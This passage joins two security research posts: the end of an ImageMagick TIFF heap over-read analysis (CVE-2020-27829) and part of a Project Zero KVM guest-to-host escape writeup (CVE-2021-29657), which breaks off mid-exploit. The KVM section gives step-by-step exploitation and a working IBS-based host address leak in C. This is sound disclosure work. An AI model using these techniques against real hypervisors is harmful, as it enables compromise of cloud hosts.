So, this extent value of 248 and sizeof(*strip_pixels) which is 1 is passed to “AcquireQuantumMemory” function and total memory of 248 bytes get allocated.

This is how memory is allocated.

“Strip_pixel” is pointer to newly allocated memory.

Note that this is 248 bytes of newly allocated memory. Since we are using ASAN, each byte will contain “0xbe” which is default for newly allocated memory by ASAN:

https://github.com/llvm-mirror/compiler-rt/blob/master/lib/asan/asan_flags.inc

The memory start location is 0x6110000002c0 and the end location is 0x6110000003b7, which is 248 bytes total.

This memory is set to 0 by a “memset” call and this is assigned to a variable “p”, as mentioned in below image. Please also note that “p” will be used as a pointer to traverse this memory location going forward in the program:

Later on we see that there is a call to “TIFFReadEncodedPixels” which reads strip data from TIFF file and stores it into newly allocated buffer “strip_pixels” of 248 bytes (documentation here: http://www.libtiff.org/man/TIFFReadEncodedStrip.3t.html):

To understand what this TIFF file data is, we need to again refer to TIFF file structure. We can see that there is a tag called “StripOffsets” and its value is 8, which specifies the offset of strip data inside TIFF file:

We see the following when we check data at offset 8 in the TIFF file:

We see the following when we print the data in “strip_pixels” (note that it is in little endian format):

So “strip_pixels” is the actual data from the TIFF file from offset 8. This will be traversed through pointer “p”.

Inside “ReadTIFFImage” function there are two nested for loops.

  • The first “for loop” is responsible for iterating for “samples_per_pixel” time which is 3.
  • The second “for loop” is responsible for iterating the pixel data for “image->rows” times, which is 32. This second loop will be executed for 32 times or number of rows in the image irrespective of allocated buffer size .
  • Inside this second for loop, we can see something like this:

  • We can notice that “ImportQuantumPixel” function uses the “p” pointer to read the data from “strip_pixels” and after each call to “ImportQuantumPixel”, value of “p” will be increased by “stride”.

Here “stride” is calculated by calling function “TIFFVStripSize()” function which as per documentation returns the number of bytes in a strip with nrows rows of data.  In this case it is 14. So, every time pointer “p” is incremented by “14” or “0xE” inside the second for loop.

If we print the image structure which is passed to “ImportQuantumPixels” function as parameter, we can see following:

Here we can notice that the columns value is 3, the rows value is 32 and depth is 9. If we check in the POC TIFF file, this has been taken from ImageWidth and ImageLength and BitsPerSample value:

Ultimately, control reaches to “ImportRGBQuantum” and then to the “PushQuantumPixel” function and one of the arguments to this function is the pixels data which is pointed by “p”. Remember that this points to the memory address which was previously allocated using the “AcquireQuantumMemory” function, and that its length is 248 byte and every time value of “p” is increased by 14.

The “PushQuantumPixel” function is used to read pixel data from “p” into the internal pixel data storage of ImageMagick. There is a for loop which is responsible for reading data from the provided pixels array of 248 bytes into a structure “quantum_Info”. This loop reads data from pixels incrementally and saves it in the “quantum_info->state.pixels” field.

The root cause here is that there are no proper bounds checks and the program tries to read data beyond the allocated buffer size on the heap, while reading the strip data inside a for loop.

This causes a crash in ImageMagick as we can see below:

Root cause

Therefore, to summarize, the program crashes because:

  1. The program allocates 248 bytes of memory to process strip data for image, a pointer “p” points to this memory.
  2. Inside a for loop this pointer is increased by “14” or “0xE” for number of rows in the image, which in this case is 32.
  3. Based on this calculation, 32*14=448 bytes or more amount of memory is required but only 248 in actual memory were allocated.
  4. The program tries to read data assuming total memory is of 448+ bytes, but the fact that only 248 bytes are available causes an Out of Bound memory read issue.

How it was fixed?

If we check at the patch diff, we can see that the following changes were made to fix this issue:

Here the 2nd argument to “AcquireQuantumMemory” is multiplied by 2 thus increasing the total amount of memory and preventing this Out of Bound read issue from heap memory. The total memory allocated is 496 bytes, 248*2=496 bytes, as we can see below:

Another issue with the fix:

A new version of ImageMagick 7.0.46 was released to fix this issue. While the patch fixes the memory allocation issue, if we check the code below, we can see that there was a call to memset which didn’t set the proper memory size to zero.

Memory was allocated extent*2*sizeof(*strip_pixels) but in this memset to 0 was only done for extent*sizeof(*strip_pixels). This means half of the memory was set to 0 and rest contained 0xbebebebe, which is by default for ASAN new memory allocation.

This has since been fixed in subsequent releases of ImageMagick by using extent=2*TIFFStripSize(tiff); in the following patch:

https://github.com/ImageMagick/ImageMagick/commit/a5b64ccc422615264287028fe6bea8a131043b59#diff-0a5eef63b187504ff513056aa8fd6a7f5c1f57b6d2577a75cff428c0c7530978

Conclusion:

Processing various image files requires deep understanding of various file formats and thus it is possible that something may not be exactly implemented or missed. This can lead to various vulnerabilities in such image processing software. Some of this vulnerability can lead to DoS and some can lead to remote code execution affecting every installation of such popular software.

Fuzzing plays an important role in finding vulnerabilities often missed by developers and during testing. We at McAfee constantly fuzz various closed source as well as open source software to help secure them. We work very closely with various vendors and do responsible disclosure. This shows McAfee’s commitment towards securing the software and protecting our customers from various threats.

We will continue to fuzz various software and work with vendors to help mitigate risk arriving from such threats.

We would like to thank and appreciate ImageMagick team for quickly resolving this issue within 24 hours and releasing a new version to fix this issue.

The post Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829 appeared first on McAfee Blog.

An EPYC escape: Case-study of a KVM breakout

By: Ryan
29 June 2021 at 15:58

Posted by Felix Wilhelm, Project Zero

Introduction

KVM (for Kernel-based Virtual Machine) is the de-facto standard hypervisor for Linux-based cloud environments. Outside of Azure, almost all large-scale cloud and hosting providers are running on top of KVM, turning it into one of the fundamental security boundaries in the cloud.

In this blog post I describe a vulnerability in KVM’s AMD-specific code and discuss how this bug can be turned into a full virtual machine escape. To the best of my knowledge, this is the first public writeup of a KVM guest-to-host breakout that does not rely on bugs in user space components such as QEMU. The discussed bug was assigned CVE-2021-29657, affects kernel versions v5.10-rc1 to v5.12-rc6 and was patched at the end of March 2021. As the bug only became exploitable in v5.10 and was discovered roughly 5 months later, most real world deployments of KVM should not be affected. I still think the issue is an interesting case study in the work required to build a stable guest-to-host escape against KVM and hope that this writeup can strengthen the case that hypervisor compromises are not only theoretical issues.

I start with a short overview of KVM’s architecture, before diving into the bug and its exploitation.

KVM

KVM is a Linux based open source hypervisor supporting hardware accelerated virtualization on x86, ARM, PowerPC and S/390. In contrast to the other big open source hypervisor Xen, KVM is deeply integrated with the Linux Kernel and builds on its scheduling, memory management and hardware integrations to provide efficient virtualization.

KVM is implemented as one or more kernel modules (kvm.ko plus kvm-intel.ko or kvm-amd.ko on x86) that expose a low-level IOCTL-based API to user space processes over the /dev/kvm device. Using this API, a user space process (often called VMM for Virtual Machine Manager) can create new VMs, assign vCPUs and memory, and intercept memory or IO accesses to provide access to emulated or virtualization-aware hardware devices. QEMU has been the standard user space choice for KVM-based virtualization for a long time, but in the last few years alternatives like LKVM, crosvm or Firecracker have started to become popular.

While KVM’s reliance on a separate user space component might seem complicated at first, it has a very nice benefit: Each VM running on a KVM host has a 1:1 mapping to a Linux process, making it managable using standard Linux tools.

This means for example, that a guest's memory can be inspected by dumping the allocated memory of its user space process or that resource limits for CPU time and memory can be applied easily. Additionally, KVM can offload most work related to device emulation to the userspace component. Outside of a couple of performance-sensitive devices related to interrupt handling, all of the complex low-level code for providing virtual disk, network or GPU access can be implemented in userspace.  

When looking at public writeups of KVM-related vulnerabilities and exploits it becomes clear that this design was a wise decision. The large majority of disclosed vulnerabilities and all publicly available exploits affect QEMU and its support for emulated/paravirtualized devices.

Even though KVM’s kernel attack surface is significantly smaller than the one exposed by a default QEMU configuration or similar user space VMMs, a KVM vulnerability has advantages that make it very valuable for an attacker:

  • Whereas user space VMMs can be sandboxed to reduce the impact of a VM breakout, no such option is available for KVM itself. Once an attacker is able to achieve code execution (or similarly powerful primitives like write access to page tables) in the context of the host kernel, the system is fully compromised.
  • Due to the somewhat poor security history of QEMU, new user space VMMs like crosvm or Firecracker are written in Rust, a memory safe language. Of course, there can still be non-memory safety vulnerabilities or problems due to incorrect or buggy usage of the KVM APIs, but using Rust effectively prevents the large majority of bugs that were discovered in C-based user space VMMs in the past.
  • Finally, a pure KVM exploit can work against targets that use proprietary or heavily modified user space VMMs. While the big cloud providers do not go into much detail about their virtualization stacks publicly, it is safe to assume that they do not depend on an unmodified QEMU version for their production workloads. In contrast, KVM’s smaller code base makes heavy modifications unlikely (and KVM’s contributor list points at a strong tendency to upstream such modifications when they exist).  

With these advantages in mind, I decided to spend some time hunting for a KVM vulnerability that could be turned into a guest-to-host escape. In the past, I had some success with finding vulnerabilities in KVM’s support for nested virtualization on Intel CPUs so reviewing the same functionality for AMD seemed like a good starting point. This is even more true, because the recent increase of AMD’s market share in the server segment means that KVM’s AMD implementation is suddenly becoming a more interesting target than it was in the last years.

Nested virtualization, the ability for a VM (called L1) to spawn nested guests (L2), was also a niche feature for a long time. However, due to hardware improvements that reduce its overhead and increasing customer demand it’s becoming more widely available. For example, Microsoft is heavily pushing for Virtualization-based Security as part of newer Windows versions, requiring nested virtualization to support cloud-hosted Windows installations. KVM enables support for nested virtualization on both AMD and Intel by default, so if an administrator or the user space VMM does not explicitly disable it, it’s part of the attack surface for a malicious or compromised VM.

AMD’s virtualization extension is called SVM (for Secure Virtual Machine) and in order to support nested virtualization, the host hypervisor needs to intercept all SVM instructions that are executed by its guests, emulate their behavior and keep its state in sync with the underlying hardware. As you might imagine, implementing this correctly is quite difficult with a large potential for complex logic flaws, making it a perfect target for manual code review.

The Bug

Before diving into the KVM codebase and the bug I discovered, I want to quickly introduce how AMD SVM works to make the rest of the post easier to understand. (For a thorough documentation see AMD64 Architecture Programmer’s Manual, Volume 2: System Programming Chapter 15.) SVM adds support for 6 new instructions to x86-64 if SVM support is enabled by setting the SVME bit in the EFER MSR. The most interesting of these instructions is VMRUN, which (as its name suggests) is responsible for running a guest VM. VMRUN takes an implicit parameter via the RAX register pointing to the page-aligned physical address of a data structure called “virtual machine control block” (VMCB), which describes the state and configuration of the VM.

The VMCB is split into two parts: First, the State Save area, which stores the values of all guest registers, including segment and control registers. Second, the Control area which describes the configuration of the VM. The Control area describes the virtualization features enabled for a VM,  sets which VM actions are intercepted to trigger a VM exit and stores some fundamental configuration values such as the page table address used for nested paging.

If the VMCB is correctly prepared (and we are not already running in a VM), VMRUN will first save the host state in a memory region called the host save area, whose address is configured by writing a physical address to the VM_HSAVE_PA MSR. Once the host state is saved, the CPU switches to the VM context and VMRUN only returns once a VM exit is triggered for one reason or another.

An interesting aspect of SVM is that a lot of the state recovery after a VM exit has to be done by the hypervisor. Once a VM exit occurs, only RIP, RSP and RAX are restored to the previous host values and all other general purpose registers still contain the guest values. In addition, a full context switch requires manual execution of the VMSAVE/VMLOAD instructions which save/load additional system registers (FS, SS, LDTR, STAR, LSTAR …) from memory.

For nested virtualization to work, KVM intercepts execution of the VMRUN instruction and creates its own VMCB based on the VMCB the L1 guest prepared (called vmcb12 in KVM terminology). Of course, KVM can’t trust the guest provided vmcb12 and needs to carefully validate all fields that end up in the real VMCB that gets passed to the hardware (known as vmcb02).

Most of the KVM’s code for nested virtualization on AMD is implemented in arch/x86/kvm/svm/nested.c and the code that intercepts VMRUN instructions of nested guests is implemented in nested_svm_vmrun:

int nested_svm_vmrun(struct vcpu_svm *svm)

{

        int ret;

        struct vmcb *vmcb12;

        struct vmcb *hsave = svm->nested.hsave;

        struct vmcb *vmcb = svm->vmcb;

        struct kvm_host_map map;

        u64 vmcb12_gpa;

   

        vmcb12_gpa = svm->vmcb->save.rax; ** 1 ** 

        ret = kvm_vcpu_map(&svm->vcpu, gpa_to_gfn(vmcb12_gpa), &map); ** 2 **

        …

        ret = kvm_skip_emulated_instruction(&svm->vcpu);

        vmcb12 = map.hva;

        if (!nested_vmcb_checks(svm, vmcb12)) { ** 3 **

                vmcb12->control.exit_code    = SVM_EXIT_ERR;

                vmcb12->control.exit_code_hi = 0;

                vmcb12->control.exit_info_1  = 0;

                vmcb12->control.exit_info_2  = 0;

                goto out;

        }

        ...

        /*

         * Save the old vmcb, so we don't need to pick what we save, but can

         * restore everything when a VMEXIT occurs

         */

        hsave->save.es     = vmcb->save.es;

        hsave->save.cs     = vmcb->save.cs;

        hsave->save.ss     = vmcb->save.ss;

        hsave->save.ds     = vmcb->save.ds;

        hsave->save.gdtr   = vmcb->save.gdtr;

        hsave->save.idtr   = vmcb->save.idtr;

        hsave->save.efer   = svm->vcpu.arch.efer;

        hsave->save.cr0    = kvm_read_cr0(&svm->vcpu);

        hsave->save.cr4    = svm->vcpu.arch.cr4;

        hsave->save.rflags = kvm_get_rflags(&svm->vcpu);

        hsave->save.rip    = kvm_rip_read(&svm->vcpu);

        hsave->save.rsp    = vmcb->save.rsp;

        hsave->save.rax    = vmcb->save.rax;

        if (npt_enabled)

                hsave->save.cr3    = vmcb->save.cr3;

        else

                hsave->save.cr3    = kvm_read_cr3(&svm->vcpu);

        copy_vmcb_control_area(&hsave->control, &vmcb->control);

        svm->nested.nested_run_pending = 1;

        if (enter_svm_guest_mode(svm, vmcb12_gpa, vmcb12)) ** 4 **

                goto out_exit_err;

        if (nested_svm_vmrun_msrpm(svm))

                goto out;

out_exit_err:

        svm->nested.nested_run_pending = 0;

        svm->vmcb->control.exit_code    = SVM_EXIT_ERR;

        svm->vmcb->control.exit_code_hi = 0;

        svm->vmcb->control.exit_info_1  = 0;

        svm->vmcb->control.exit_info_2  = 0;

        nested_svm_vmexit(svm);

out:

        kvm_vcpu_unmap(&svm->vcpu, &map, true);

        return ret;

}

The function first fetches the value of RAX out of the currently active vmcb (svm->vcmb) in 1 (numbers are marked in the code samples). For guests using nested paging (which is the only relevant configuration nowadays) RAX contains a guest physical address (GPA), which needs to be translated into a host physical address (HPA) first. kvm_vcpu_map (2) takes care of this translation and maps the underlying page to a host virtual address (HVA) that can be directly accessed by KVM.

Once the VMCB is mapped, nested_vmcb_checks is called for some basic validation in 3. Afterwards, the L1 guest context which is stored in svm->vmcb is copied into the host save area svm->nested.hsave before KVM enters the nested guest context by calling enter_svm_guest_mode (4).

int enter_svm_guest_mode(struct vcpu_svm *svm, u64 vmcb12_gpa,

                         struct vmcb *vmcb12)

{

        int ret;

        svm->nested.vmcb12_gpa = vmcb12_gpa;

        load_nested_vmcb_control(svm, &vmcb12->control);

        nested_prepare_vmcb_save(svm, vmcb12);

        nested_prepare_vmcb_control(svm);

        ret = nested_svm_load_cr3(&svm->vcpu, vmcb12->save.cr3,

                                  nested_npt_enabled(svm));

        if (ret)

                return ret;

        svm_set_gif(svm, true);

        return 0;

}

static void load_nested_vmcb_control(struct vcpu_svm *svm,

                                     struct vmcb_control_area *control)

{

        copy_vmcb_control_area(&svm->nested.ctl, control);

        ...

}

Looking at enter_svm_guest_mode we can see that KVM copies the vmcb12 control area directly into svm->nested.ctl and does not perform any further checks on the copied value.

Readers familiar with double fetch or Time-of-Check-to-Time-of-Use vulnerabilities might already see a potential issue here: The call to nested_vmcb_checks at the beginning of nested_svm_vmrun performs all of its checks on a copy of the VMCB that is stored in guest memory. This means that a guest with multiple CPU cores can modify fields in the VMCB after they are verified in nested_vmcb_checks, but before they are copied to svm->nested.ctl in load_nested_vmcb_control.

Let’s look at nested_vmcb_checks to see what kind of checks we can bypass with this approach:

static bool nested_vmcb_check_controls(struct vmcb_control_area *control)

{

        if ((vmcb_is_intercept(control, INTERCEPT_VMRUN)) == 0)

                return false;

        if (control->asid == 0)

                return false;

        if ((control->nested_ctl & SVM_NESTED_CTL_NP_ENABLE) &&

            !npt_enabled)

                return false;

        return true;

}

At first glance this looks pretty harmless. control->asid isn’t used anywhere and the last check is only relevant for systems where nested paging isn’t supported. However, the first check turns out to be very interesting.

For reasons unknown to me, SVM VMCBs contain a bit that enables or disables interception of the VMRUN instruction when executed inside a guest. Clearing this bit isn’t actually supported by hardware and results in an immediate VMEXIT, so the check in nested_vmcb_check_controls simply replicates this behavior.  When we race and bypass the check by repeatedly flipping the value of the INTERCEPT_VMRUN bit, we can end up in a situation where svm->nested.ctl contains a 0 in place of the INTERCEPT_VMRUN bit. To understand the impact we first need to see how nested vmexit’s are handled in KVM:

The main SVM exit handler is the function handle_exit in arch/x86/kvm/svm.c, which is called whenever a VMexit occurs. When KVM is running a nested guest, it first has to check if the exit should be handled by itself or the L1 hypervisor. To do this it calls the function nested_svm_exit_handled (5) which will return NESTED_EXIT_DONE if the vmexit will be handled by the L1 hypervisor and no further processing by the L0 hypervisor is needed:

 static int handle_exit(struct kvm_vcpu *vcpu, fastpath_t exit_fastpath)

{

        struct vcpu_svm *svm = to_svm(vcpu);

        struct kvm_run *kvm_run = vcpu->run;

        u32 exit_code = svm->vmcb->control.exit_code;

         

        if (is_guest_mode(vcpu)) {

                int vmexit;

                trace_kvm_nested_vmexit(exit_code, vcpu, KVM_ISA_SVM);

                vmexit = nested_svm_exit_special(svm);

                if (vmexit == NESTED_EXIT_CONTINUE)

                        vmexit = nested_svm_exit_handled(svm); ** 5 **

                if (vmexit == NESTED_EXIT_DONE)

                        return 1;

        }

}

static int nested_svm_intercept(struct vcpu_svm *svm)

{

        // exit_code==INTERCEPT_VMRUN when the L2 guest executes vmrun

        u32 exit_code = svm->vmcb->control.exit_code;

        int vmexit = NESTED_EXIT_HOST;

        switch (exit_code) {

        case SVM_EXIT_MSR:

                vmexit = nested_svm_exit_handled_msr(svm);

                break;

        case SVM_EXIT_IOIO:

                vmexit = nested_svm_intercept_ioio(svm);

                break;

         

        default: {

                if (vmcb_is_intercept(&svm->nested.ctl, exit_code)) ** 7 **

                        vmexit = NESTED_EXIT_DONE;

        }

        }

        return vmexit;

}

int nested_svm_exit_handled(struct vcpu_svm *svm)

{

        int vmexit;

        vmexit = nested_svm_intercept(svm); ** 6 ** 

        if (vmexit == NESTED_EXIT_DONE)

                nested_svm_vmexit(svm); ** 8 **

        return vmexit;

}

nested_svm_exit_handled first calls nested_svm_intercept (6) to see if the exit should be handled. When we trigger an exit by executing VMRUN in a L2 guest, the default case is executed (7) to see if the INTERCEPT_VMRUN bit in svm->nested.ctl is set. Normally, this should always be the case and the function returns NESTED_EXIT_DONE to trigger a nested VM exit from L2 to L1 and to let the L1 hypervisor handle the exit (8). (This way KVM supports infinite nesting of hypervisors).

However, if the L1 guest exploited the race condition described above svm->nested.ctl won’t have the INTERCEPT_VMRUN bit set and the VM exit will be handled by KVM itself. This results in a second call to nested_svm_vmrun while still running inside the L2 guest context. nested_svm_vmrun isn’t written to handle this situation and will blindly overwrite the L1 context stored in svm->nested.hsave with data from the currently active svm->vmcb which contains data for the L2 guest:

     /*

         * Save the old vmcb, so we don't need to pick what we save, but can

         * restore everything when a VMEXIT occurs

         */

        hsave->save.es     = vmcb->save.es;

        hsave->save.cs     = vmcb->save.cs;

        hsave->save.ss     = vmcb->save.ss;

        hsave->save.ds     = vmcb->save.ds;

        hsave->save.gdtr   = vmcb->save.gdtr;

        hsave->save.idtr   = vmcb->save.idtr;

        hsave->save.efer   = svm->vcpu.arch.efer;

        hsave->save.cr0    = kvm_read_cr0(&svm->vcpu);

        hsave->save.cr4    = svm->vcpu.arch.cr4;

        hsave->save.rflags = kvm_get_rflags(&svm->vcpu);

        hsave->save.rip    = kvm_rip_read(&svm->vcpu);

        hsave->save.rsp    = vmcb->save.rsp;

        hsave->save.rax    = vmcb->save.rax;

        if (npt_enabled)

                hsave->save.cr3    = vmcb->save.cr3;

        else

                hsave->save.cr3    = kvm_read_cr3(&svm->vcpu);

        copy_vmcb_control_area(&hsave->control, &vmcb->control);

This becomes a security issue due to the way Model Specific Register (MSR) intercepts are handled for nested guests:

SVM uses a permission bitmap to control which MSRs can be accessed by a VM. The bitmap is a 8KB data structure with two bits per MSR, one of which controls read access and the other write access. A 1 bit in this position means the access is intercepted and triggers a vm exit, a 0 bit means the VM has direct access to the MSR. The HPA address of the bitmap is stored in the VMCB control area and for normal L1 KVM guests, the pages are allocated and pinned into memory as soon as a vCPU is created.

For a nested guest, the MSR permission bitmap is stored in svm->nested.msrpm and its physical address is copied into the active VMCB (in svm->vmcb->control.msrpm_base_pa) while the nested guest is running. Using the described double invocation of nested_svm_vmrun, a malicious guest can copy this value into the svm->nested.hsave VMCB when copy_vmcb_control_area is executed. This is interesting because the KVM’s hsave area normally only contains data from the L1 guest context so svm->nested.hsave.msrpm_base_pa would normally point to the pinned vCPU-specific MSR bitmap pages.

This edge case becomes exploitable thanks to a relatively recent change in KVM:

Since commit “2fcf4876: KVM: nSVM: implement on demand allocation of the nested state” from last October, svm->nested.msrpm is dynamically allocated and freed when a guest changes the SVME bit of the MSR_EFER register:

int svm_set_efer(struct kvm_vcpu *vcpu, u64 efer)

{

        struct vcpu_svm *svm = to_svm(vcpu);

        u64 old_efer = vcpu->arch.efer;

        vcpu->arch.efer = efer;

        if ((old_efer & EFER_SVME) != (efer & EFER_SVME)) {

                if (!(efer & EFER_SVME)) {

                        svm_leave_nested(svm);

                        svm_set_gif(svm, true);

                        ...                     /*

                         * Free the nested guest state, unless we are in SMM.

                         * In this case we will return to the nested guest

                         * as soon as we leave SMM.

                         */

                        if (!is_smm(&svm->vcpu))

                                svm_free_nested(svm);

                } ...

}

}

For the “disable SVME” case, KVM will first call svm_leave_nested to forcibly leave potential

nested guests and then free the svm->nested data structures (including the backing pages for the MSR permission bitmap) in svm_free_nested. As svm_leave_nested believes that svm->nested.hsave contains the saved context of the L1 guest, it simply copies its control area to the real VMCB:

void svm_leave_nested(struct vcpu_svm *svm)

{

        if (is_guest_mode(&svm->vcpu)) {

                struct vmcb *hsave = svm->nested.hsave;

                struct vmcb *vmcb = svm->vmcb;

                ...

                copy_vmcb_control_area(&vmcb->control, &hsave->control);

                ...

        }

}

But as mentioned before, svm->nested.hsave->control.msrpm_base_pa can still point to

svm->nested->msrpm. Once svm_free_nested is finished and KVM passes control back to the guest, the CPU will use the freed pages for its MSR permission checks. This gives a guest unrestricted access to host MSRs if the pages are reused and partially overwritten with zeros.

To summarize, a malicious guest can gain access to host MSRs using the following approach:

  1. Enable the SVME bit in MSR_EFER to enable nested virtualization
  2. Repeatedly try to launch a L2 guest using the VMRUN instruction while flipping the INTERCEPT_VMRUN bit on a second CPU core.
  3. If VMRUN succeeds, try to launch a “L3” guest using another invocation of VMRUN. If this fails, we have lost the race in step 2 and must try again. If VMRUN succeeds we have successfully overwritten svm->nested.hsave with our L2 context.  
  4. Clear the SVME bit in MSR_EFER while still running in the “L3” context. This frees the MSR permission bitmap backing pages used by the L2 guest who is now executing again.
  5. Wait until the KVM host reuses the backing pages. This will potentially clear all or some of the bits, giving the guest access to host MSRs.

When I initially discovered and reported this vulnerability, I was feeling pretty confident that this type of MSR access should be more or less equivalent to full code execution on the host. While my feeling turned out to be correct, getting there still took me multiple weeks of exploit development. In the next section I’ll describe the steps to turn this primitive into a guest-to-host escape.

The Exploit

Assuming our guest can get full unrestricted access to any MSR (which is only a question of timing thanks to init_on_alloc=1 being the default for most modern distributions), how can we escalate this into running arbitrary code in the context of the KVM host? To answer this question we first need to look at what kind of MSRs are supported on a modern AMD system. Looking at the BIOS and Kernel Developer’s Guide for recent AMD processors we can find a wide range of MSRs starting with well known and widely used ones such as EFER (the Extended Feature Enable Register) or LSTAR (the syscall target address) to rarely used ones like SMI_ON_IO_TRAP (can be used to generate a System Management Mode Interrupt when specific IO port ranges are accessed).

Looking at the list, several registers like LSTAR or KERNEL_GSBASE seem like interesting targets for redirecting the execution of the host kernel. Unrestricted access to these registers is actually enabled by default, however they are automatically restored to a valid state by KVM after a vmexit so modifying them does not lead to any changes in host behavior.

Still, there is one MSR that we previously mentioned and that seems to give us a straightforward way to achieve code execution: The VM_HSAVE_PA that stores the physical address of the host save area, which is used to restore the host context when a vmexit occurs. If we can point this MSR at a memory location under our control we should be able to fake a malicious host context and execute our own code after a vmexit.

While this sounds pretty straightforward in theory, implementing it still has some challenges:

  • AMD is pretty clear about the fact that software should not touch the host save area in any way and that the data stored in this area is CPU-dependent: “Processor implementations may store only part or none of host state in the memory area pointed to by VM_HSAVE_PA MSR and may store some or all host state in hidden on-chip memory. Different implementations may choose to save the hidden parts of the host’s segment registers as well as the selectors. For these reasons, software must not rely on the format or contents of the host state save area, nor attempt to change host state by modifying the contents of the host save area.” (AMD64 Architecture Programmer’s Manual, Volume 2: System Programming, Page 477). To strengthen the point, the format of the host save area is undocumented.
  • Debugging issues involving an invalid host state is very tedious as any issue leads to an immediate processor shutdown. Even worse, I wasn’t sure if rewriting the VM_HSAVE_PA MSR while running inside a VM can even work. It’s not really something that should happen during normal operation so in the worst case scenario, overwriting the MSR would just lead to an immediate crash.
  • Even if we can create a valid (but malicious) host save area in our guest, we still need some way to identify its host physical address (HPA). Because our guest runs with nested paging enabled, physical addresses that we can see in the guest (GPAs) are still one address translation away from their HPA equivalent.

After spending some time scrolling through AMD’s documentation, I still decided that VM_HSAVE_PA seems to be the best way forward and decided to tackle these problems one by one.

After dumping the host save area of a normal KVM guest running on an AMD EPYC 7351P CPU, the first problem goes away quickly: As it turns out, the host save area has the same layout as a normal VMCB with only a couple of relevant fields initialized. Even better, the initialized fields include all the saved host information documented in the AMD manual so the fear that all interesting host state is stored in on-chip memory seems to be unfounded.

Saving Host State. To ensure that the host can resume operation after #VMEXIT, VMRUN saves at least the following host state information:

  • CS.SEL, NEXT_RIP—The CS selector and rIP of the instruction following the VMRUN. On #VMEXIT the host resumes running at this address.
  • RFLAGS, RAX—Host processor mode and the register used by VMRUN to address the VMCB.
  • SS.SEL, RSP—Stack pointer for host
  • CRO, CR3, CR4, EFER—Paging/operating mode for host
  • IDTR, GDTR—The pseudo-descriptors. VMRUN does not save or restore the host LDTR.
  • ES.SEL and DS.SEL.

Under the mistaken assumption that I solved the problem of creating a fake but valid host save area, I decided to look into building an infoleak that gives me the ability to translate GPAs to HPAs. A couple hours of manual reading led me to an AMD-specific performance monitoring feature called Instruction Based Sampling (IBS). When IBS is enabled by writing the right magic invocation to a set of MSRs, it samples every Nth instruction that is executed and collects a wide range of information about the instruction. This information is logged in another set of MSRs and can be used to analyze the performance of any piece of code running on the CPU. While most of the documentation for IBS is pretty sparse or hard to follow, the very useful open source project AMD IBS Toolkit contains working code, a readable high level description of IBS and a lot of useful references.

IBS supports two different modes of operation, one that samples Instruction fetches and one that samples micro-ops (which you can think of as the internal RISC representation of more complex x64 instructions). Depending on the operation mode, different data is collected. Besides a lot of caching and latency information that we don’t care about, fetch sampling also returns the virtual address and physical address of the fetched instruction. Op sampling is even more useful as it returns the virtual address of the underlying instruction as well as virtual and physical addresses accessed by any load or store micro op.

Interestingly, IBS does not seem to care about the virtualization context of its user and every physical address returned by it is an HPA (of course this is not a problem outside of this exploit as guest accesses to the IBS MSR’s will normally be restricted). The wide range of data returned by IBS and the fact that it’s completely driven by MSR reads and writes make it the perfect tool for building infoleaks for our exploit.

Building a GPA -> HPA leak boils down to enabling IBS ops sampling, executing a lot of instructions that access a specific memory page in our VM and reading the IBS_DC_PHYS_AD MSR to find out its HPA:

// This function leaks the HPA of a guest page using

// AMD's Instruction Based Sampling. We try to sample

// one of our memory loads/writes to *p, which will

// store the physical memory address in MSR_IBC_DH_PHYS_AD

static u64 leak_guest_hpa(u8 *p) {

  volatile u8 *ptr = p;

  u64 ibs = scatter_bits(0x2, IBS_OP_CUR_CNT_23) |

            scatter_bits(0x10, IBS_OP_MAX_CNT) | IBS_OP_EN;

  while (true) {

    wrmsr(MSR_IBS_OP_CTL, ibs);

    u64 x = 0;

    for (int i = 0; i < 0x1000; i++) {

      x = ptr[i];

      ptr[i] += ptr[i - 1];

      ptr[i] = x;

      if (i % 50 == 0) {

        u64 valid = rdmsr(MSR_IBS_OP_CTL) & IBS_OP_VAL;

        if (valid) {

          u64 op3 = rdmsr(MSR_IBS_OP_DATA3);

          if ((op3 & IBS_ST_OP) || (op3 & IBS_LD_OP)) {

            if (op3 & IBS_DC_PHY_ADDR_VALID) {

              printf("[x] leak_guest_hpa: %lx %lx %lx\n", rdmsr(MSR_IBS_OP_RIP),

                     rdmsr(MSR_IBS_DC_PHYS_AD), rdmsr(MSR_IBS_DC_LIN_AD));

              return rdmsr(MSR_IBS_DC_PHYS_AD) & ~(0xFFF);

            }

          }

          wrmsr(MSR_IBS_OP_CTL, ibs);

        }

      }

    }

    wrmsr(MSR_IBS_OP_CTL, ibs & ~IBS_OP_EN);

  }

}

Using this infoleak primitive, I started to create a fake host save area by preparing my own page tables (for pointing CR3 at them), interrupt descriptor tables and segment descriptors and pointing RIP to a primitive shellcode that would write to the serial console. Of course, my first tries immediately crashed the whole system and even after spending multiple days to make sure everything was set up correctly, the system would crash immediately once I pointed the hsave MSR at my own location.

After getting frustrated with the total lack of progress, watching my server reboot for the hundredth time, trying to come up with a different exploitation strategy for two weeks and learning about the surprising regularity of physical page migrations on Linux, I realized that I made an important mistake. Just because the CPU initializes all the expected fields in the host save area, it is not safe to assume that these fields are actually used for restoring the host context. Slow trial and error led to the discovery that my AMD EPYC CPU ignores everything in the host save area besides the values of the RIP, RSP and RAX registers.

While this register control would make a local privilege escalation straightforward, escaping the VM boundary is a bit more complicated. RIP and RSP control make launching a kernel ROP chain the next logical step, but this requires us to first break the host kernel's address randomization and to find a way to store controlled data at a known host virtual address (HVA).

Fortunately, we have IBS as a powerful infoleak building primitive and can use it to gather all required information in a single run:

  • Leaking the host kernel's (or more specifically kvm-amd.ko’s) base address can be done by enabling IBS sampling with a small sampling interval and immediately triggering a VM exit. When VM execution continues, the IBS result MSRs will contain the HVA of instructions executed by KVM during the exit handling.
  • The most powerful way to store data at a known HVA is to leak the location of the kernel’s linear mapping (also known as physmap), a 1:1 mapping of all physical pages on the system. This gives us a GPA->HVA translation primitive by first using our GPA->HPA infoleak from above and then adding the HPA to the physmap base address. Leaking the physmap is possible by sampling micro ops in the host kernel until we find a read or write operation, where the lower ~30 bits of the accessed virtual address and physical address are identical.

Having all these building blocks in place, we could now try to build a kernel ROP chain that executes some interesting payload. However, there is one important caveat. When we take over execution after a vmexit, the system is still in a somewhat unstable state. As mentioned above, SVM’s context switching is very minimal and we are at least one VMLOAD instruction and reenabling of interrupts away from a usable system. While it is surely possible to exploit this bug and to restore the original host context using a sufficiently complex ROP chain, I decided to find a way to run my own code instead.

